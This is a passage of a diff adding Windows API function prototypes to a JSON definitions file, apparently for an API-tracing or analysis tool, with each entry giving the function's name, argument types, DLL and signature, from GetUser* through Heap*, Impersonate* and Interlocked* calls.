BOOL bErase);" + }, + { + "function_name": "GetUserDefaultLCID", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LCID GetUserDefaultLCID(VOID);" + }, + { + "function_name": "GetUserNameA", + "arguments": [ + "LPTSTR", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetUserNameA(LPTSTR lpBuffer, LPDWORD nSize);" + }, + { + "function_name": "GetUserNameW", + "arguments": [ + "LPWSTR", + "LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL GetUserNameW( LPWSTR lpszName, LPDWORD lpSize );" + }, + { + "function_name": "GetUserNameExA", + "arguments": [ + "EXTENDED_NAME_FORMAT", + "LPTSTR", + "PULONG" + ], + "dll_name": "secur32.dll", + "full_prototype": "BOOLEAN GetUserNameExA( EXTENDED_NAME_FORMAT NameFormat, LPTSTR lpNameBuffer, PULONG nSize);" + }, + { + "function_name": "GetUserObjectInformationA", + "arguments": [ + "HANDLE", + "int", + "PVOID", + "DWORD", + "LPDWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetUserObjectInformationA(HANDLE hObj, int nIndex, PVOID pvInfo, DWORD nLength,LPDWORD lpnLengthNeeded);" + }, + { + "function_name": "GetUserObjectInformationW", + "arguments": [ + "HANDLE", + "int", + "PVOID", + "DWORD", + "LPDWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetUserObjectInformationW(HANDLE hObj, int nIndex, PVOID pvInfo, DWORD nLength,LPDWORD lpnLengthNeeded);" + }, + { + "function_name": "GetUserObjectSecurity", + "arguments": [ + "HANDLE", + "PSECURITY_INFORMATION", + "PSECURITY_DESCRIPTOR", + "DWORD", + "LPDWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetUserObjectSecurity(HANDLE hObj, PSECURITY_INFORMATION pSIRequested, PSECURITY_DESCRIPTOR pSID, DWORD nLength, LPDWORD lpnLengthNeeded);" + }, + { + "function_name": "GetVersion", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GetVersion(VOID);" + }, + { + "function_name": "GetVersionExA", + "arguments": [ + "LPOSVERSIONINFO" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetVersionExA(LPOSVERSIONINFO lpVersionInformation);" + }, + { + "function_name": "GetVersionExW", + "arguments": [ + "LPOSVERSIONINFOW" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetVersionExW(LPOSVERSIONINFOW lpVersionInformation);" + }, + { + "function_name": "GetViewportExtEx", + "arguments": [ + "HDC", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetViewportExtEx(HDC hdc, LPSIZE lpSize);" + }, + { + "function_name": "GetViewportOrgEx", + "arguments": [ + "HDC", + "LPPOINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetViewportOrgEx(HDC hdc, LPPOINT lpPoint);" + }, + { + "function_name": "GetVolumeInformationA", + "arguments": [ + "LPCTSTR", + "LPTSTR", + "DWORD", + "LPDWORD", + "LPDWORD", + "LPDWORD", + "LPTSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetVolumeInformationA( LPCTSTR lpRootPathName, LPTSTR lpVolumeNameBuffer, DWORD nVolumeNameSize, LPDWORD lpVolumeSerialNumber, LPDWORD lpMaximumComponentLength, LPDWORD lpFileSystemFlags, LPTSTR lpFileSystemNameBuffer, DWORD nFileSystemNameSize );" + }, + { + "function_name": "GetVolumeInformationW", + "arguments": [ + "LPCWSTR", + "LPWSTR", + "DWORD", + "PDWORD", + "PDWORD", + "PDWORD", + "LPWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GetVolumeInformationW(LPCWSTR lpRootPathName,LPWSTR lpVolumeNameBuffer,DWORD nVolumeNameSize,PDWORD lpVolumeSerialNumber,PDWORD lpMaximumComponentLength,PDWORD lpFileSystemFlags,LPWSTR lpFileSystemNameBuffer,DWORD nFileSystemNameSize );" + }, + { + "function_name": "GetWindow", + "arguments": [ + "HWND", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND GetWindow(HWND hWnd,UINT uCmd);" + }, + { + "function_name": "GetWindowContextHelpId", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD GetWindowContextHelpId(HWND hwnd);" + }, + { + "function_name": "GetWindowDC", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "HDC GetWindowDC(HWND hWnd);" + }, + { + "function_name": "GetWindowLongA", + "arguments": [ + "HWND", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG GetWindowLongA(HWND hWnd,int nIndex);" + }, + { + "function_name": "GetWindowLongW", + "arguments": [ + "HWND", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG GetWindowLongW(HWND hWnd, int nIndex);" + }, + { + "function_name": "GetWindowPlacement", + "arguments": [ + "HWND", + "WINDOWPLACEMENT *" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetWindowPlacement(HWND hWnd,WINDOWPLACEMENT * lpwndpl);" + }, + { + "function_name": "GetWindowRect", + "arguments": [ + "HWND", + "LPRECT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GetWindowRect(HWND hWnd,LPRECT lpRect);" + }, + { + "function_name": "GetWindowRgn", + "arguments": [ + "HWND", + "HRGN" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetWindowRgn(HWND hWnd, HRGN hRgn);" + }, + { + "function_name": "GetWindowsDirectoryA", + "arguments": [ + "LPTSTR", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetWindowsDirectoryA(LPTSTR lpBuffer,UINT uSize);" + }, + { + "function_name": "GetWindowsDirectoryW", + "arguments": [ + "LPWSTR", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GetWindowsDirectoryW(LPWSTR lpBuffer,UINT uSize);" + }, + { + "function_name": "GetWindowTextA", + "arguments": [ + "HWND", + "LPTSTR", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetWindowTextA(HWND hWnd, LPTSTR lpString, int nMaxCount);" + }, + { + "function_name": "GetWindowTextLengthA", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetWindowTextLengthA(HWND hWnd);" + }, + { + "function_name": "GetWindowTextLengthW", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetWindowTextLengthW(HWND hWnd);" + }, + { + "function_name": "GetWindowTextW", + "arguments": [ + "HWND", + "LPWSTR", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "int GetWindowTextW(HWND hWnd, LPWSTR lpString, int nMaxCount);" + }, + { + "function_name": "GetWindowThreadProcessId", + "arguments": [ + "HWND", + "LPDWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD GetWindowThreadProcessId(HWND hWnd, LPDWORD lpdwProcessId);" + }, + { + "function_name": "GetWindowWord", + "arguments": [ + "HWND", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "WORD GetWindowWord(HWND hWnd,int nIndex);" + }, + { + "function_name": "GetWinMetaFileBits", + "arguments": [ + "HENHMETAFILE", + "UINT", + "LPBYTE", + "INT", + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT GetWinMetaFileBits(HENHMETAFILE hemf, UINT cbBuffer, LPBYTE lpbBuffer, INT fnMapMode, HDC hdcRef);" + }, + { + "function_name": "GetWindowExtEx", + "arguments": [ + "HDC", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetWindowExtEx(HDC hdc, LPSIZE lpSize);" + }, + { + "function_name": "GetWindowOrgEx", + "arguments": [ + "HDC", + "LPPOINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetWindowOrgEx(HDC hdc, LPPOINT lpPoint);" + }, + { + "function_name": "GetWorldTransform", + "arguments": [ + "HDC", + "LPXFORM" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL GetWorldTransform(HDC hdc, LPXFORM lpXform);" + }, + { + "function_name": "glAccum", + "arguments": [ + "GLenum", + "GLfloat" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glAccum(GLenum op,GLfloat value);" + }, + { + "function_name": "glAlphaFunc", + "arguments": [ + "GLenum", + "GLclampf" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glAlphaFunc(GLenum func,GLclampf ref);" + }, + { + "function_name": "glBegin", + "arguments": [ + "GLenum" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glBegin(GLenum mode);" + }, + { + "function_name": "glBitmap", + "arguments": [ + "GLsizei", + "GLsizei", + "GLfloat", + "GLfloat", + "GLfloat", + "GLfloat", + "const GLubyte" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glBitmap(GLsizei width, GLsizei height, GLfloat xorig, GLfloat yorig, GLfloat xmove, GLfloat ymove, const GLubyte *bitmap);" + }, + { + "function_name": "glBlendFunc", + "arguments": [ + "GLenum", + "GLenum" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glBlendFunc(GLenum sfactor, GLenum dfactor);" + }, + { + "function_name": "glCallList", + "arguments": [ + "GLuint" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glCallList(GLuint list);" + }, + { + "function_name": "glCallLists", + "arguments": [ + "GLsizei", + "GLenum", + "const GLvoid" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glCallLists(GLsizei n, GLenum type, const GLvoid *lists);" + }, + { + "function_name": "glClear", + "arguments": [ + "GLbitfield" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glClear(GLbitfield mask);" + }, + { + "function_name": "glClearAccum", + "arguments": [ + "GLfloat", + "GLfloat", + "GLfloat", + "GLfloat" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glClearAccum(GLfloat red, GLfloat green, GLfloat blue, GLfloat alpha);" + }, + { + "function_name": "glClearColor", + "arguments": [ + "GLclampf", + "GLclampf", + "GLclampf", + "GLclampf" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glClearColor(GLclampf red, GLclampf green, GLclampf blue,GLclampf alpha);" + }, + { + "function_name": "glClearDepth", + "arguments": [ + "GLclampd" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glClearDepth(GLclampd depth);" + }, + { + "function_name": "glClearIndex", + "arguments": [ + "GLfloat" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glClearIndex(GLfloat c);" + }, + { + "function_name": "glClearStencil", + "arguments": [ + "GLint" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glClearStencil(GLint s);" + }, + { + "function_name": "glClipPlane", + "arguments": [ + "GLenum", + "const GLdouble" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glClipPlane(GLenum plane, const GLdouble *equation);" + }, + { + "function_name": "glColor3b", + "arguments": [ + "GLbyte", + "GLbyte", + "GLbyte" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glColor3b(GLbyte red,GLbyte green,GLbyte blue);" + }, + { + "function_name": "glColor3bv", + "arguments": [ + "const GLbyte" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glColor3bv(const GLbyte *v);" + }, + { + "function_name": "glColor3d", + "arguments": [ + "GLdouble", + "GLdouble", + "GLdouble" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glColor3d(GLdouble red, GLdouble green, GLdouble blue);" + }, + { + "function_name": "glColor3dv", + "arguments": [ + "const GLdouble" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glColor3dv(const GLdouble *v);" + }, + { + "function_name": "glColor3f", + "arguments": [ + "GLfloat", + "GLfloat", + "GLfloat" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glColor3f(GLfloat red, GLfloat green, GLfloat blue);" + }, + { + "function_name": "glColor3fv", + "arguments": [ + "const GLfloat" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glColor3fv(const GLfloat *v);" + }, + { + "function_name": "glColor3i", + "arguments": [ + "GLint", + "GLint", + "GLint" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glColor3i(GLint red, GLint green, GLint blue);" + }, + { + "function_name": "glColor3iv", + "arguments": [ + "const GLint" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glColor3iv(const GLint *v);" + }, + { + "function_name": "glColor3s", + "arguments": [ + "GLshort", + "GLshort", + "GLshort", + "GLshort" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glColor3s(GLshort red, GLshort green, GLshort blue, GLshort alpha);" + }, + { + "function_name": "glColor3sv", + "arguments": [ + "const GLshort" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glColor3sv(const GLshort *v);" + }, + { + "function_name": "glEnd", + "arguments": [ + "" + ], + "dll_name": "opengl32.dll", + "full_prototype": "void glEnd(void);" + }, + { + "function_name": "GlobalAddAtomA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "ATOM GlobalAddAtomA(LPCTSTR lpString);" + }, + { + "function_name": "GlobalAddAtomW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "ATOM GlobalAddAtomW(LPCWSTR str);" + }, + { + "function_name": "GlobalAlloc", + "arguments": [ + "UINT", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HGLOBAL GlobalAlloc(UINT uFlags, DWORD dwBytes);" + }, + { + "function_name": "GlobalCompact", + "arguments": [ + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "SIZE_T GlobalCompact(DWORD MinFree);" + }, + { + "function_name": "GlobalDeleteAtom", + "arguments": [ + "ATOM" + ], + "dll_name": "kernel32.dll", + "full_prototype": "ATOM GlobalDeleteAtom(ATOM nAtom);" + }, + { + "function_name": "GlobalFindAtomA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "ATOM GlobalFindAtomA(LPCTSTR lpString);" + }, + { + "function_name": "GlobalFindAtomW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "ATOM GlobalFindAtomW(LPCWSTR str);" + }, + { + "function_name": "GlobalFix", + "arguments": [ + "HGLOBAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "void GlobalFix(HGLOBAL hglb);" + }, + { + "function_name": "GlobalFlags", + "arguments": [ + "HGLOBAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GlobalFlags(HGLOBAL hMem);" + }, + { + "function_name": "GlobalFree", + "arguments": [ + "HGLOBAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HGLOBAL GlobalFree(HGLOBAL hMem);" + }, + { + "function_name": "GlobalGetAtomNameA", + "arguments": [ + "ATOM", + "LPTSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GlobalGetAtomNameA(ATOM nAtom, LPTSTR lpBuffer, int nSize);" + }, + { + "function_name": "GlobalGetAtomNameW", + "arguments": [ + "ATOM", + "LPWSTR", + "INT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT GlobalGetAtomNameW(ATOM atom, LPWSTR buffer, INT count);" + }, + { + "function_name": "GlobalHandle", + "arguments": [ + "LPCVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HGLOBAL GlobalHandle(LPCVOID pMem);" + }, + { + "function_name": "GlobalLock", + "arguments": [ + "HGLOBAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPVOID GlobalLock(HGLOBAL hMem);" + }, + { + "function_name": "GlobalMemoryStatus", + "arguments": [ + "LPMEMORYSTATUS" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID GlobalMemoryStatus(LPMEMORYSTATUS lpBuffer);" + }, + { + "function_name": "GlobalMemoryStatusEx", + "arguments": [ + "LPMEMORYSTATUSEX" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GlobalMemoryStatusEx(LPMEMORYSTATUSEX lpBuffer);" + }, + { + "function_name": "GlobalReAlloc", + "arguments": [ + "HGLOBAL", + "DWORD", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HGLOBAL GlobalReAlloc(HGLOBAL hMem, DWORD dwBytes, UINT uFlags);" + }, + { + "function_name": "GlobalSize", + "arguments": [ + "HGLOBAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD GlobalSize(HGLOBAL hMem);" + }, + { + "function_name": "GlobalUnfix", + "arguments": [ + "HGLOBAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID GlobalUnfix(HGLOBAL hMem);" + }, + { + "function_name": "GlobalUnlock", + "arguments": [ + "HGLOBAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GlobalUnlock(HGLOBAL hMem);" + }, + { + "function_name": "GlobalUnWire", + "arguments": [ + "HGLOBAL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL GlobalUnWire(HGLOBAL hMem);" + }, + { + "function_name": "GrayStringA", + "arguments": [ + "HDC", + "HBRUSH", + "GRAYSTRINGPROC", + "LPARAM", + "int", + "int", + "int", + "int", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GrayStringA(HDC hDC, HBRUSH hBrush,GRAYSTRINGPROC lpOutputFunc, LPARAM lpData, int nCount, int X, int Y, int nWidth, int nHeight);" + }, + { + "function_name": "GrayStringW", + "arguments": [ + "HDC", + "HBRUSH", + "GRAYSTRINGPROC", + "LPARAM", + "int", + "int", + "int", + "int", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL GrayStringW(HDC hDC, HBRUSH hBrush,GRAYSTRINGPROC lpOutputFunc, LPARAM lpData, int nCount, int X, int Y, int nWidth, int nHeight);" + }, + { + "function_name": "HeapAlloc", + "arguments": [ + "HANDLE", + "DWORD", + "SIZE_T" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPVOID HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);" + }, + { + "function_name": "HeapCompact", + "arguments": [ + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "SIZE_T HeapCompact(HANDLE hHeap, DWORD dwFlags);" + }, + { + "function_name": "HeapCreate", + "arguments": [ + "DWORD", + "SIZE_T", + "SIZE_T" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HANDLE HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize);" + }, + { + "function_name": "HeapDestroy", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL HeapDestroy(HANDLE hHeap);" + }, + { + "function_name": "HeapFree", + "arguments": [ + "HANDLE", + "DWORD", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem);" + }, + { + "function_name": "HeapLock", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL HeapLock(HANDLE hHeap);" + }, + { + "function_name": "HeapReAlloc", + "arguments": [ + "HANDLE", + "DWORD", + "LPVOID", + "SIZE_T" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPVOID HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes);" + }, + { + "function_name": "HeapSize", + "arguments": [ + "HANDLE", + "DWORD", + "LPCVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "SIZE_T HeapSize(HANDLE hHeap, DWORD dwFlags, LPCVOID lpMem);" + }, + { + "function_name": "HeapUnlock", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL HeapUnlock(HANDLE hHeap);" + }, + { + "function_name": "HeapValidate", + "arguments": [ + "HANDLE", + "DWORD", + "LPCVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL HeapValidate(HANDLE hHeap, DWORD dwFlags, LPCVOID lpMem);" + }, + { + "function_name": "HeapWalk", + "arguments": [ + "HANDLE", + "LPPROCESS_HEAP_ENTRY" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL HeapWalk(HANDLE hHeap, LPPROCESS_HEAP_ENTRY lpEntry);" + }, + { + "function_name": "HideCaret", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL HideCaret(HWND hWnd);" + }, + { + "function_name": "HiliteMenuItem", + "arguments": [ + "HWND", + "HMENU", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL HiliteMenuItem(HWND hwnd, HMENU hmenu, UINT uItemHilite,UINT uHilite);" + }, + { + "function_name": "IcmpCloseHandle", + "arguments": [ + "HANDLE" + ], + "dll_name": "icmp.dll", + "full_prototype": "BOOL IcmpCloseHandle(HANDLE IcmpHandle);" + }, + { + "function_name": "IcmpCreateFile", + "arguments": [ + "" + ], + "dll_name": "icmp.dll", + "full_prototype": "HANDLE IcmpCreateFile(void);" + }, + { + "function_name": "IcmpSendEcho", + "arguments": [ + "HANDLE", + "IPAddr", + "LPVOID", + "WORD", + "PIP_OPTION_INFORMATION", + "LPVOID", + "DWORD", + "DWORD" + ], + "dll_name": "icmp.dll", + "full_prototype": "DWORD IcmpSendEcho( HANDLE IcmpHandle, IPAddr DestinationAddress, LPVOID RequestData, WORD RequestSize, PIP_OPTION_INFORMATION RequestOptions, LPVOID ReplyBuffer, DWORD ReplySize, DWORD Timeout);" + }, + { + "function_name": "ImpersonateDdeClientWindow", + "arguments": [ + "HWND", + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ImpersonateDdeClientWindow(HWND hWndClient, HWND hWndServer);" + }, + { + "function_name": "ImpersonateLoggedOnUser", + "arguments": [ + "HANDLE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ImpersonateLoggedOnUser( HANDLE hToken );" + }, + { + "function_name": "ImpersonateNamedPipeClient", + "arguments": [ + "HANDLE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ImpersonateNamedPipeClient( HANDLE hNamedPipe );" + }, + { + "function_name": "ImpersonateSelf", + "arguments": [ + "SECURITY_IMPERSONATION_LEVEL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ImpersonateSelf( SECURITY_IMPERSONATION_LEVEL ImpersonationLevel );" + }, + { + "function_name": "inet_addr", + "arguments": [ + "const char FAR *" + ], + "dll_name": "Wsock32.dll", + "full_prototype": "unsigned long inet_addr (const char FAR * cp);" + }, + { + "function_name": "InflateRect", + "arguments": [ + "LPRECT", + "int", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL InflateRect(LPRECT lprc, int dx,int dy);" + }, + { + "function_name": "InitAtomTable", + "arguments": [ + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL InitAtomTable(DWORD nSize);" + }, + { + "function_name": "InitCommonControlsEx", + "arguments": [ + "LPINITCOMMONCONTROLSEX" + ], + "dll_name": "comctl32.dll", + "full_prototype": "BOOL InitCommonControlsEx(LPINITCOMMONCONTROLSEX pInitCtrls);" + }, + { + "function_name": "InitializeAcl", + "arguments": [ + "PACL", + "DWORD", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL InitializeAcl( PACL pAcl, DWORD nAclLength, DWORD dwAclRevision );" + }, + { + "function_name": "InitializeCriticalSection", + "arguments": [ + "LPCRITICAL_SECTION" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID InitializeCriticalSection(LPCRITICAL_SECTION lpCriticalSection);" + }, + { + "function_name": "InitializeSecurityDescriptor", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL InitializeSecurityDescriptor( PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD dwRevision );" + }, + { + "function_name": "InitializeSid", + "arguments": [ + "PSID", + "PSID_IDENTIFIER_AUTHORITY", + "BYTE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL InitializeSid( PSID Sid, PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority, BYTE nSubAuthorityCount );" + }, + { + "function_name": "InitiateSystemShutdownA", + "arguments": [ + "LPSTR", + "LPSTR", + "DWORD", + "BOOL", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL InitiateSystemShutdownA( LPSTR lpMachineName, LPSTR lpMessage, DWORD dwTimeout, BOOL bForceAppsClosed, BOOL bRebootAfterShutdown );" + }, + { + "function_name": "InitiateSystemShutdownW", + "arguments": [ + "LPWSTR", + "LPWSTR", + "DWORD", + "BOOL", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL InitiateSystemShutdownW( LPWSTR lpMachineName, LPWSTR lpMessage, DWORD dwTimeout, BOOL bForceAppsClosed, BOOL bRebootAfterShutdown );" + }, + { + "function_name": "InSendMessage", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL InSendMessage(VOID);" + }, + { + "function_name": "InsertMenuA", + "arguments": [ + "HMENU", + "UINT", + "UINT", + "UINT", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL InsertMenuA(HMENU hMenu, UINT uPosition, UINT uFlags, UINT uIDNewItem, LPCTSTR lpNewItem);" + }, + { + "function_name": "InsertMenuItemA", + "arguments": [ + "HMENU", + "UINT", + "BOOL", + "LPMENUITEMINFO" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL InsertMenuItemA(HMENU hMenu, UINT uItem, BOOL fByPosition, LPMENUITEMINFO lpmii);" + }, + { + "function_name": "InsertMenuItemW", + "arguments": [ + "HMENU", + "UINT", + "BOOL", + "LPCMENUITEMINFOW" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL InsertMenuItemW(HMENU hMenu, UINT uItem, BOOL fByPosition, LPCMENUITEMINFOW lpmii);" + }, + { + "function_name": "InsertMenuW", + "arguments": [ + "HMENU", + "UINT", + "UINT", + "UINT", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL InsertMenuW(HMENU hMenu, UINT uPosition, UINT uFlags, UINT uIDNewItem, LPCWSTR lpNewItem);" + }, + { + "function_name": "InstallNewDevice", + "arguments": [ + "HWND", + "LPGUID", + "PDWORD" + ], + "dll_name": "newdev.dll", + "full_prototype": "BOOL InstallNewDevice( HWND hwndParent, LPGUID ClassGuid, PDWORD pReboot);" + }, + { + "function_name": "InterlockedCompareExchange", + "arguments": [ + "PVOID", + "PVOID", + "PVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "PVOID InterlockedCompareExchange(PVOID *Destination, PVOID Exchange, PVOID Comperand);" + }, + { + "function_name": "InterlockedDecrement", + "arguments": [ + "LPLONG" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LONG InterlockedDecrement(LPLONG lpAddend);" + }, + { + "function_name": "InterlockedExchange", + "arguments": [ + "LPLONG", + "LONG" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LONG InterlockedExchange(LPLONG Target, LONG Value);" + }, + { + "function_name": "InterlockedExchangeAdd", + "arguments": [ + "PLONG", + "LONG" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LONG InterlockedExchangeAdd(PLONG Addend, LONG Increment);" + }, + { + "function_name": "InterlockedIncrement", + "arguments": [ + "LPLONG" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LONG InterlockedIncrement(LPLONG lpAddend);" + }, + { + "function_name": "InternetAutodial", + "arguments": [ + "DWORD", + "HWND" + ], + "dll_name": "wininet.dll", + "full_prototype": "BOOL InternetAutodial(DWORD dwFlags,HWND hwndParent);" + }, + { + "function_name": "InternetAutodialHangup", + "arguments": [ + "DWORD" + ], + "dll_name": "wininet.dll", + "full_prototype": "BOOL InternetAutodialHangup(DWORD dwReserved);" + }, + { + "function_name": "InternetGetConnectedState", + "arguments": [ + "LPDWORD", + "DWORD" + ], + "dll_name": "wininet.dll", + "full_prototype": "BOOL InternetGetConnectedState(LPDWORD lpdwFlags,DWORD dwReserved);" + }, + { + "function_name": "IntersectClipRect", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int IntersectClipRect(HDC hdc, int nLeftRect, int nTopRect, int nRightRect, int nBottomRect);" + }, + { + "function_name": "IntersectRect", + "arguments": [ + "LPRECT", + "CONST RECT *", + "CONST RECT *" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL IntersectRect(LPRECT lprcDst, CONST RECT * lprcSrc1, CONST RECT * lprcSrc2);" + }, + { + "function_name": "InvalidateRect", + "arguments": [ + "HWND", + "CONST RECT *", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL InvalidateRect(HWND hWnd,CONST RECT * lpRect, BOOL bErase);" + }, + { + "function_name": "InvalidateRgn", + "arguments": [ + "HWND", + "HRGN", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL InvalidateRgn(HWND hWnd, HRGN hRgn, BOOL bErase);" + }, + { + "function_name": "InvertRect", + "arguments": [ + "HDC", + "CONST RECT *" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL InvertRect(HDC hDC, CONST RECT * lprc);" + }, + { + "function_name": "InvertRgn", + "arguments": [ + "HDC", + "HRGN" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL InvertRgn(HDC hdc, HRGN hrgn);" + }, + { + "function_name": "IsBadCodePtr", + "arguments": [ + "FARPROC" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL IsBadCodePtr(FARPROC lpfn);" + }, + { + "function_name": "IsBadHugeReadPtr", + "arguments": [ + "CONST 